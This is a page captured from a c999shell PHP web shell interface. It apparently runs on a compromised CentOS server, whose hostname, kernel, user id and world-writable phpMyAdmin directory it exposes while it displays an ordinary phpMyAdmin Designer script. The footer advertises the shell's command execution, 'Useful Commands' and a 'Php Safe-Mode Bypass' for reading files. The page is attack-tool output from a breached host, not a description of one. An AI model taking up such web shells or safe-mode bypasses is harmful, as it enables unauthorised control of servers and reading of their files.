Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/phpMyAdmin/ drwxrwxrwx | |
| Viewing file: Select action/file-type: <?php
/* vim: set expandtab sw=4 ts=4 sts=4: */
/**
* @package phpMyAdmin-Designer
*/
/**
*
*/
include_once 'pmd_common.php';
$table = $T;
$display_field = $F;
if ($cfgRelation['displaywork']) {
$disp = PMA_getDisplayField($db, $table);
if ($disp) {
if ($display_field != $disp) {
$upd_query = 'UPDATE ' . PMA_backquote($GLOBALS['cfgRelation']['db']) . '.' . PMA_backquote($cfgRelation['table_info'])
. ' SET display_field = \'' . PMA_sqlAddslashes($display_field) . '\''
. ' WHERE db_name = \'' . PMA_sqlAddslashes($db) . '\''
. ' AND table_name = \'' . PMA_sqlAddslashes($table) . '\'';
} else {
$upd_query = 'DELETE FROM ' . PMA_backquote($GLOBALS['cfgRelation']['db']) . '.' . PMA_backquote($cfgRelation['table_info'])
. ' WHERE db_name = \'' . PMA_sqlAddslashes($db) . '\''
. ' AND table_name = \'' . PMA_sqlAddslashes($table) . '\'';
}
} elseif ($display_field != '') {
$upd_query = 'INSERT INTO ' . PMA_backquote($GLOBALS['cfgRelation']['db']) . '.' . PMA_backquote($cfgRelation['table_info'])
. '(db_name, table_name, display_field) '
. ' VALUES('
. '\'' . PMA_sqlAddslashes($db) . '\','
. '\'' . PMA_sqlAddslashes($table) . '\','
. '\'' . PMA_sqlAddslashes($display_field) . '\')';
}
if (isset($upd_query)) {
$upd_rs = PMA_query_as_controluser($upd_query);
}
} // end if
header("Content-Type: text/xml; charset=utf-8");
header("Cache-Control: no-cache");
die("<root act='save_pos' return=__('Modifications have been saved')></root>");
?>
|
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0055 ]-- |